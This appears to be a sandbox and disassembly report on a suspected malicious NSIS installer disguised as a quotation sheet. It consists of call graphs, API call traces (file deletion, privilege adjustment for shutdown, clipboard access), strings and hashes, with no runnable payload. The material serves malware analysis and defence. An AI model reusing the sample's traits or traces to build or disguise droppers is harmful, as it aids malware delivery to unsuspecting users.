1000260e GlobalSize 4574->4575 4574->4577 4575->4577 4576->4573 4576->4574 4577->4508 4579 10002aae 4578->4579 4580 10002aee GlobalFree 4579->4580 4628 10001215 GlobalAlloc 4581->4628 4583 1000243a lstrcpynA 4589 100023e6 4583->4589 4584 1000244b StringFromGUID2 WideCharToMultiByte 4584->4589 4585 1000246f WideCharToMultiByte 4585->4589 4586 10002490 wsprintfA 4586->4589 4587 100024b4 GlobalFree 4587->4589 4588 100024ee GlobalFree 4588->4498 4589->4583 4589->4584 4589->4585 4589->4586 4589->4587 4589->4588 4590 10001266 2 API calls 4589->4590 4629 100012d1 4589->4629 4590->4589 4633 10001215 GlobalAlloc 4592->4633 4594 1000155f 4595 1000156c lstrcpyA 4594->4595 4597 10001586 4594->4597 4598 
100015a0 4595->4598 4597->4598 4599 1000158b wsprintfA 4597->4599 4600 10001266 4598->4600 4599->4598 4601 100012a8 GlobalFree 4600->4601 4602 1000126f GlobalAlloc lstrcpynA 4600->4602 4601->4502 4602->4601 4604 100023ae 4603->4604 4605 100017c5 4603->4605 4604->4605 4606 100023c7 GlobalFree 4604->4606 4605->4515 4605->4516 4606->4604 4608 10001266 2 API calls 4607->4608 4609 10001503 4608->4609 4609->4518 4610->4521 4611->4547 4613 10001552 4612->4613 4613->4544 4620 10001215 GlobalAlloc 4614->4620 4616 10001233 lstrcpynA 4616->4543 4617->4547 4618->4539 4619->4546 4620->4616 4622 100012b4 4621->4622 4623 10001224 2 API calls 4622->4623 4624 100012cf 4623->4624 4624->4558 4626 10002581 4625->4626 4627 1000252b VirtualAlloc 4625->4627 4626->4559 4627->4626 4628->4589 4630 100012f9 4629->4630 4631 100012da 4629->4631 4630->4589 4631->4630 4632 100012e0 lstrcpyA 4631->4632 4632->4630 4633->4594 4634 402410 4645 402b44 4634->4645 4636 40241a 4637 402a3a 18 API calls 4636->4637 4638 402423 4637->4638 4639 4026a6 4638->4639 4640 40242d RegQueryValueExA 4638->4640 4641 40244d 4640->4641 4644 402453 RegCloseKey 4640->4644 4641->4644 4649 405dc1 wsprintfA 4641->4649 4644->4639 4646 402a3a 18 API calls 4645->4646 4647 402b5d 4646->4647 4648 402b6b RegOpenKeyExA 4647->4648 4648->4636 4649->4644 5434 401490 5435 40507c 25 API calls 5434->5435 5436 401497 5435->5436 5437 404191 5438 4041a7 5437->5438 5443 4042b3 5437->5443 5441 404048 19 API calls 5438->5441 5439 404322 5440 4043f6 5439->5440 5442 40432c GetDlgItem 5439->5442 5448 4040af 8 API calls 5440->5448 5444 4041fd 5441->5444 5445 404342 5442->5445 5446 4043b4 5442->5446 5443->5439 5443->5440 5447 4042f7 GetDlgItem SendMessageA 5443->5447 5449 404048 19 API calls 5444->5449 5445->5446 5450 404368 6 API calls 5445->5450 5446->5440 5451 4043c6 5446->5451 5468 40406a KiUserCallbackDispatcher 5447->5468 5458 4043f1 5448->5458 5453 40420a CheckDlgButton 5449->5453 5450->5446 5454 4043cc SendMessageA 5451->5454 5455 4043dd 
5451->5455 5466 40406a KiUserCallbackDispatcher 5453->5466 5454->5455 5455->5458 5459 4043e3 SendMessageA 5455->5459 5456 40431d 5460 40441b SendMessageA 5456->5460 5459->5458 5460->5439 5461 404228 GetDlgItem 5467 40407d SendMessageA 5461->5467 5463 40423e SendMessageA 5464 404265 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5463->5464 5465 40425c GetSysColor 5463->5465 5464->5458 5465->5464 5466->5461 5467->5463 5468->5456 4820 401595 4821 402a3a 18 API calls 4820->4821 4822 40159c SetFileAttributesA 4821->4822 4823 4015ae 4822->4823 5476 401717 5477 402a3a 18 API calls 5476->5477 5478 40171e SearchPathA 5477->5478 5479 401739 5478->5479 5480 10001058 5481 10001074 5480->5481 5482 100010dc 5481->5482 5483 10001091 5481->5483 5484 100014bb GlobalFree 5481->5484 5485 100014bb GlobalFree 5483->5485 5484->5483 5486 100010a1 5485->5486 5487 100010b1 5486->5487 5488 100010a8 GlobalSize 5486->5488 5489 100010b5 GlobalAlloc 5487->5489 5490 100010c6 5487->5490 5488->5487 5491 100014e2 3 API calls 5489->5491 5492 100010d1 GlobalFree 5490->5492 5491->5490 5492->5482 5493 402519 5494 40252e 5493->5494 5495 40251e 5493->5495 5497 402a3a 18 API calls 5494->5497 5496 402a1d 18 API calls 5495->5496 5499 402527 5496->5499 5498 402535 lstrlenA 5497->5498 5498->5499 5500 402557 5499->5500 5501 405b7d WriteFile 5499->5501 5501->5500 5502 40149d 5503 4014ab PostQuitMessage 5502->5503 5504 40226e 5502->5504 5503->5504 5505 100010e0 5509 1000110e 5505->5509 5506 100011c4 GlobalFree 5507 100012ad 2 API calls 5507->5509 5508 100011c3 5508->5506 5509->5506 5509->5507 5509->5508 5510 10001155 GlobalAlloc 5509->5510 5511 100011ea GlobalFree 5509->5511 5512 10001266 2 API calls 5509->5512 5513 100011b1 GlobalFree 5509->5513 5514 100012d1 lstrcpyA 5509->5514 5510->5509 5511->5509 5512->5513 5513->5509 5514->5509 5515 4037a1 5516 4037ac 5515->5516 5517 4037b0 5516->5517 5518 4037b3 GlobalAlloc 5516->5518 5518->5517 5526 10002162 5527 100021c0 5526->5527 5528 100021f6 5526->5528 
5527->5528 5529 100021d2 GlobalAlloc 5527->5529 5529->5527 5530 401b23 5531 401b74 5530->5531 5535 401b30 5530->5535 5532 401b78 5531->5532 5533 401b9d GlobalAlloc 5531->5533 5546 40226e 5532->5546 5551 405e63 lstrcpynA 5532->5551 5534 405e85 18 API calls 5533->5534 5538 401bb8 5534->5538 5535->5538 5539 401b47 5535->5539 5536 405e85 18 API calls 5540 402268 5536->5540 5538->5536 5538->5546 5549 405e63 lstrcpynA 5539->5549 5544 405659 MessageBoxIndirectA 5540->5544 5541 401b8a GlobalFree 5541->5546 5543 401b56 5550 405e63 lstrcpynA 5543->5550 5544->5546 5547 401b65 5552 405e63 lstrcpynA 5547->5552 5549->5543 5550->5547 5551->5541 5552->5546 5553 401ca7 5554 402a1d 18 API calls 5553->5554 5555 401cae 5554->5555 5556 402a1d 18 API calls 5555->5556 5557 401cb6 GetDlgItem 5556->5557 5558 402513 5557->5558 4058 40192a 4059 40192c 4058->4059 4060 402a3a 18 API calls 4059->4060 4061 401931 4060->4061 4064 405705 4061->4064 4105 4059c3 4064->4105 4067 405744 4070 40587c 4067->4070 4119 405e63 lstrcpynA 4067->4119 4068 40572d DeleteFileA 4069 40193a 4068->4069 4070->4069 4137 406167 FindFirstFileA 4070->4137 4072 40576a 4073 405770 lstrcatA 4072->4073 4074 40577d 4072->4074 4075 405783 4073->4075 4120 40591c lstrlenA 4074->4120 4078 405791 lstrcatA 4075->4078 4079 405788 4075->4079 4081 40579c lstrlenA FindFirstFileA 4078->4081 4079->4078 4079->4081 4083 405872 4081->4083 4103 4057c0 4081->4103 4082 40589a 4140 4058d5 lstrlenA CharPrevA 4082->4140 4083->4070 4085 405900 CharNextA 4085->4103 4087 4056bd 5 API calls 4088 4058ac 4087->4088 4089 4058b0 4088->4089 4090 4058c6 4088->4090 4089->4069 4094 40507c 25 API calls 4089->4094 4092 40507c 25 API calls 4090->4092 4092->4069 4093 405851 FindNextFileA 4095 405869 FindClose 4093->4095 4093->4103 4096 4058bd 4094->4096 4095->4083 4097 405d1e 38 API calls 4096->4097 4100 4058c4 4097->4100 4099 405705 62 API calls 4099->4103 4100->4069 4101 40507c 25 API calls 4101->4093 4102 40507c 25 API calls 4102->4103 4103->4085 4103->4093 
Call graph (edge list of the form caller->callee over function addresses, with Win32 API names as node labels; the rendered graph is not reproduced here). Nodes recoverable from the dump include 40322b SetErrorMode GetVersion (entry), 40365f GetCurrentProcess OpenProcessToken, 40367a LookupPrivilegeValueA AdjustTokenPrivileges, 4036c6 ExitWindowsEx, 4036d9 ExitProcess, 405d1e MoveFileExA, 405c5b GetFileSize GlobalAlloc, 405b4e ReadFile, 405b7d WriteFile, 4054dd OpenClipboard EmptyClipboard GlobalAlloc GlobalLock, 405521 GlobalUnlock SetClipboardData CloseClipboard, 40536d GetDlgItem CreateThread FindCloseChangeNotification, 401d38 GetDC GetDeviceCaps and 401dae CreateFontIndirectA.

Control-flow Graph (function 0040322B; the rendered basic-block graph with executed / not-executed colouring is not reproduced here). Entry block 40322b-403260 calls SetErrorMode and GetVersion; the block list runs through 403403-40341d GetTempPathA, 403475-40348f DeleteFileA, 403523-403533 OleUninitialize, 40365f-403678 GetCurrentProcess OpenProcessToken, 40367a-4036a4 LookupPrivilegeValueA AdjustTokenPrivileges, 4036c6-4036d0 ExitWindowsEx and 4036e7-4036eb ExitProcess.
APIs
• SetErrorMode.KERNELBASE ref: 00403250
• GetVersion.KERNEL32 ref: 00403256
• lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040327F
• #17.COMCTL32(00000007,00000009), ref: 004032A1
• OleInitialize.OLE32(00000000), ref: 004032A8
• SHGetFileInfoA.SHELL32(0041ECF0,00000000,?,00000160,00000000), ref: 004032C4
• GetCommandLineA.KERNEL32(00422F20,NSIS Error), ref: 004032D9
• GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe",00000000), ref: 004032EC
• CharNextA.USER32(00000000,"C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe",00000020), ref: 00403317
• GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403414
• GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403425
• lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403431
• GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403445
• lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040344D
• SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040345E
• SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403466
• DeleteFileA.KERNELBASE(1033), ref: 0040347A
  • Part of subcall function 004061FC: GetModuleHandleA.KERNEL32(?,?,?,00403295,00000009), ref: 0040620E
  • Part of subcall function 004061FC: GetProcAddress.KERNEL32(00000000,?), ref: 00406229
• OleUninitialize.OLE32(?), ref: 00403528
• ExitProcess.KERNEL32 ref: 00403549
• GetCurrentProcess.KERNEL32(00000028,?), ref: 00403666
• OpenProcessToken.ADVAPI32(00000000), ref: 0040366D
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403685
• AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004036A4
• ExitWindowsEx.USER32(00000002,80040002), ref: 004036C8
• ExitProcess.KERNEL32 ref: 004036EB
  • Part of subcall function 00405659: MessageBoxIndirectA.USER32(00409230), ref: 004056B4
Strings
Memory Dump Source
• Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
Similarity
• API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
• String ID: "$"C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\forskningsafdelingers\Dispergerer$C:\Users\user\AppData\Local\Temp\forskningsafdelingers\Dispergerer\Nondefinite\Fordelte$C:\Users\user\Desktop$C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
• API String ID: 3329125770-113278367
• Opcode ID: a1f2791ba50795828a87b347d03cbb000542fb0d094c1ae935a36bc8bc09b862
• Instruction ID: 576d03f4a97a107fe364ed0b5bad1c5a822c5763e21245f1fe88aefb499f64b7
• Opcode Fuzzy Hash: a1f2791ba50795828a87b347d03cbb000542fb0d094c1ae935a36bc8bc09b862
• Instruction Fuzzy Hash: 4DC106706082417AE7216F319D4DA2B3EA9EF85746F04457FF481B61E2CB7C9A01CB6E

Control-flow Graph (function 004051BA; the rendered basic-block graph with executed / not-executed colouring is not reproduced here). Entry block 4051ba-4051d6; the block list runs through 4051dc-4052a3 GetDlgItem * 3 GetClientRect GetSystemMetrics SendMessageA * 2, 40536d-40538f GetDlgItem CreateThread FindCloseChangeNotification, 405444-405470 CreatePopupMenu AppendMenuA, 405485-40549b TrackPopupMenu, 4054dd-4054fd OpenClipboard EmptyClipboard GlobalAlloc GlobalLock and 405521-405535 GlobalUnlock SetClipboardData CloseClipboard.
APIs
• GetDlgItem.USER32(?,00000403), ref: 00405219
• GetDlgItem.USER32(?,000003EE), ref: 00405228
• GetClientRect.USER32(?,?), ref: 00405265
• GetSystemMetrics.USER32(00000002), ref: 0040526C
• SendMessageA.USER32(?,0000101B,00000000,?), ref: 0040528D
• SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040529E
• SendMessageA.USER32(?,00001001,00000000,?), ref: 004052B1
• SendMessageA.USER32(?,00001026,00000000,?), ref: 004052BF
• SendMessageA.USER32(?,00001024,00000000,?), ref: 004052D2
• ShowWindow.USER32(00000000,?,0000001B,?), ref: 004052F4
• ShowWindow.USER32(?,00000008), ref: 00405308
• GetDlgItem.USER32(?,000003EC), ref: 00405329
• SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405339
• SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405352
• SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040535E
• GetDlgItem.USER32(?,000003F8), ref: 00405237
  • Part of subcall function 0040407D: SendMessageA.USER32(00000028,?,00000001,00403EAE), ref: 0040408B
• GetDlgItem.USER32(?,000003EC), ref: 0040537A
• CreateThread.KERNELBASE(00000000,00000000,Function_0000514E,00000000), ref: 00405388
• FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040538F
• ShowWindow.USER32(00000000), ref: 004053B2
• ShowWindow.USER32(?,00000008), ref: 004053B9
• ShowWindow.USER32(00000008), ref: 004053FF
• SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405433
• CreatePopupMenu.USER32 ref: 00405444
• AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405459
• GetWindowRect.USER32(?,000000FF), ref: 00405479
• TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405492
• SendMessageA.USER32(?,0000102D,00000000,?), ref: 004054CE
• OpenClipboard.USER32(00000000), ref: 004054DE
• EmptyClipboard.USER32 ref: 004054E4
• GlobalAlloc.KERNEL32(00000042,?), ref: 004054ED
• GlobalLock.KERNEL32(00000000), ref: 004054F7
• SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040550B
• GlobalUnlock.KERNEL32(00000000), ref: 00405524
• SetClipboardData.USER32(00000001,00000000), ref: 0040552F
• CloseClipboard.USER32 ref: 00405535
                                                                                Strings
                                                                                • ldreboligblokkene: Installing, xrefs: 004054AA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                                                • String ID: ldreboligblokkene: Installing
                                                                                • API String ID: 4154960007-2674460088
                                                                                • Opcode ID: daaeb23021544b1a8722f3fcbf2dc746f0c1e682d10e69f52f4e240041b4e0fa
                                                                                • Instruction ID: 7964bf5c578b3de76ace8e2c28f1261f98ad7804c3e0f9b8393b3024568df2d6
                                                                                • Opcode Fuzzy Hash: daaeb23021544b1a8722f3fcbf2dc746f0c1e682d10e69f52f4e240041b4e0fa
                                                                                • Instruction Fuzzy Hash: 64A148B1900208BFDB119FA0DD89EAE7B79FB08355F00403AFA04B61A0C7B55E51DF69

                                                                                Control-flow Graph (rendered graph omitted; legend: Executed / Not Executed; edge list follows)
                                                                                control_flow_graph 489 405705-40572b call 4059c3 492 405744-40574b 489->492 493 40572d-40573f DeleteFileA 489->493 495 40574d-40574f 492->495 496 40575e-40576e call 405e63 492->496 494 4058ce-4058d2 493->494 497 405755-405758 495->497 498 40587c-405881 495->498 504 405770-40577b lstrcatA 496->504 505 40577d-40577e call 40591c 496->505 497->496 497->498 498->494 500 405883-405886 498->500 502 405890-405898 call 406167 500->502 503 405888-40588e 500->503 502->494 513 40589a-4058ae call 4058d5 call 4056bd 502->513 503->494 506 405783-405786 504->506 505->506 509 405791-405797 lstrcatA 506->509 510 405788-40578f 506->510 512 40579c-4057ba lstrlenA FindFirstFileA 509->512 510->509 510->512 514 4057c0-4057d7 call 405900 512->514 515 405872-405876 512->515 525 4058b0-4058b3 513->525 526 4058c6-4058c9 call 40507c 513->526 523 4057e2-4057e5 514->523 524 4057d9-4057dd 514->524 515->498 517 405878 515->517 517->498 528 4057e7-4057ec 523->528 529 4057f8-405806 call 405e63 523->529 524->523 527 4057df 524->527 525->503 531 4058b5-4058c4 call 40507c call 405d1e 525->531 526->494 527->523 533 405851-405863 FindNextFileA 528->533 534 4057ee-4057f0 528->534 539 405808-405810 529->539 540 40581d-405828 call 4056bd 529->540 531->494 533->514 537 405869-40586c FindClose 533->537 534->529 538 4057f2-4057f6 534->538 537->515 538->529 538->533 539->533 542 405812-40581b call 405705 539->542 549 405849-40584c call 40507c 540->549 550 40582a-40582d 540->550 542->533 549->533 552 405841-405847 550->552 553 40582f-40583f call 40507c call 405d1e 550->553 552->533 553->533
                                                                                APIs
                                                                                • DeleteFileA.KERNELBASE(?,?,75DF3410,75DF2EE0,00000000), ref: 0040572E
                                                                                • lstrcatA.KERNEL32(00420D38,\*.*,00420D38,?,?,75DF3410,75DF2EE0,00000000), ref: 00405776
                                                                                • lstrcatA.KERNEL32(?,00409014,?,00420D38,?,?,75DF3410,75DF2EE0,00000000), ref: 00405797
                                                                                • lstrlenA.KERNEL32(?,?,00409014,?,00420D38,?,?,75DF3410,75DF2EE0,00000000), ref: 0040579D
                                                                                • FindFirstFileA.KERNEL32(00420D38,?,?,?,00409014,?,00420D38,?,?,75DF3410,75DF2EE0,00000000), ref: 004057AE
                                                                                • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 0040585B
                                                                                • FindClose.KERNEL32(00000000), ref: 0040586C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                • String ID: "C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe"$8B$\*.*
                                                                                • API String ID: 2035342205-2820735536
                                                                                • Opcode ID: 59d28fae28702c1bd4f9af7611b40c66467e23846e4621e15b5c3be0a3b2a1d3
                                                                                • Instruction ID: 0bcf9a9e67a33d50b3dc7b196bcae3add4761e648fc1c1af8ecd3a5bcda4d25e
                                                                                • Opcode Fuzzy Hash: 59d28fae28702c1bd4f9af7611b40c66467e23846e4621e15b5c3be0a3b2a1d3
                                                                                • Instruction Fuzzy Hash: 8F51A331800A08BADF217B658C89BAF7B78DF46754F14807BF851761D2C73C8991DEAA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a0a3870b215c6cb57f5be28c47361f52d581e4686ba2b9b0247380936f8f490c
                                                                                • Instruction ID: 4218cb5ebcdace98cdb1216374bea5ca06482cd82b52ee1cf8be947d1aeb6f3c
                                                                                • Opcode Fuzzy Hash: a0a3870b215c6cb57f5be28c47361f52d581e4686ba2b9b0247380936f8f490c
                                                                                • Instruction Fuzzy Hash: 29F17570D00269CBDF28CFA8C8946ADBBB1FF44305F25856ED856BB281D3785A96CF44
                                                                                APIs
                                                                                • FindFirstFileA.KERNELBASE(75DF3410,00421580,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,00405A06,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,75DF3410,?,75DF2EE0,00405725,?,75DF3410,75DF2EE0), ref: 00406172
                                                                                • FindClose.KERNEL32(00000000), ref: 0040617E
                                                                                Strings
                                                                                • C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp, xrefs: 00406167
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: Find$CloseFileFirst
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp
                                                                                • API String ID: 2295610775-2551829887
                                                                                • Opcode ID: f9303f41664d55177506eb3caad4b25aa18344ea0c32c7844788a1b00efad07c
                                                                                • Instruction ID: 121c98e09340d698ac486e65b2e2524f4cd38212b93dde10f2a633de382b9f18
                                                                                • Opcode Fuzzy Hash: f9303f41664d55177506eb3caad4b25aa18344ea0c32c7844788a1b00efad07c
                                                                                • Instruction Fuzzy Hash: 82D012319190207FC34117396C0C84B7A589F653317528B33F86AF52F0D3349CA286ED

                                                                                Control-flow Graph (rendered graph omitted; legend: Executed / Not Executed; edge list follows)
                                                                                control_flow_graph 179 403b75-403b87 180 403cc8-403cd7 179->180 181 403b8d-403b93 179->181 183 403d26-403d3b 180->183 184 403cd9-403d21 GetDlgItem * 2 call 404048 SetClassLongA call 40140b 180->184 181->180 182 403b99-403ba2 181->182 187 403ba4-403bb1 SetWindowPos 182->187 188 403bb7-403bba 182->188 185 403d7b-403d80 call 404094 183->185 186 403d3d-403d40 183->186 184->183 198 403d85-403da0 185->198 190 403d42-403d4d call 401389 186->190 191 403d73-403d75 186->191 187->188 193 403bd4-403bda 188->193 194 403bbc-403bce ShowWindow 188->194 190->191 212 403d4f-403d6e SendMessageA 190->212 191->185 197 404015 191->197 199 403bf6-403bf9 193->199 200 403bdc-403bf1 DestroyWindow 193->200 194->193 207 404017-40401e 197->207 205 403da2-403da4 call 40140b 198->205 206 403da9-403daf 198->206 202 403bfb-403c07 SetWindowLongA 199->202 203 403c0c-403c12 199->203 208 403ff2-403ff8 200->208 202->207 210 403cb5-403cc3 call 4040af 203->210 211 403c18-403c29 GetDlgItem 203->211 205->206 215 403fd3-403fec DestroyWindow EndDialog 206->215 216 403db5-403dc0 206->216 208->197 213 403ffa-404000 208->213 210->207 217 403c48-403c4b 211->217 218 403c2b-403c42 SendMessageA IsWindowEnabled 211->218 212->207 213->197 220 404002-40400b ShowWindow 213->220 215->208 216->215 221 403dc6-403e13 call 405e85 call 404048 * 3 GetDlgItem 216->221 222 403c50-403c53 217->222 223 403c4d-403c4e 217->223 218->197 218->217 220->197 249 403e15-403e1a 221->249 250 403e1d-403e59 ShowWindow KiUserCallbackDispatcher call 40406a EnableWindow 221->250 228 403c61-403c66 222->228 229 403c55-403c5b 222->229 227 403c7e-403c83 call 404021 223->227 227->210 232 403c9c-403caf SendMessageA 228->232 234 403c68-403c6e 228->234 229->232 233 403c5d-403c5f 229->233 232->210 233->227 237 403c70-403c76 call 40140b 234->237 238 403c85-403c8e call 40140b 234->238 247 403c7c 237->247 238->210 246 403c90-403c9a 238->246 246->247 247->227 249->250 253 403e5b-403e5c 250->253 254 403e5e 250->254 255 403e60-403e8e GetSystemMenu EnableMenuItem SendMessageA 253->255 254->255 256 403e90-403ea1 SendMessageA 255->256 257 403ea3 255->257 258 403ea9-403ee2 call 40407d call 405e63 lstrlenA call 405e85 SetWindowTextA call 401389 256->258 257->258 258->198 267 403ee8-403eea 258->267 267->198 268 403ef0-403ef4 267->268 269 403f13-403f27 DestroyWindow 268->269 270 403ef6-403efc 268->270 269->208 272 403f2d-403f5a CreateDialogParamA 269->272 270->197 271 403f02-403f08 270->271 271->198 274 403f0e 271->274 272->208 273 403f60-403fb7 call 404048 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 272->273 273->197 279 403fb9-403fcc ShowWindow call 404094 273->279 274->197 281 403fd1 279->281 281->208
                                                                                APIs
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403BB1
                                                                                • ShowWindow.USER32(?), ref: 00403BCE
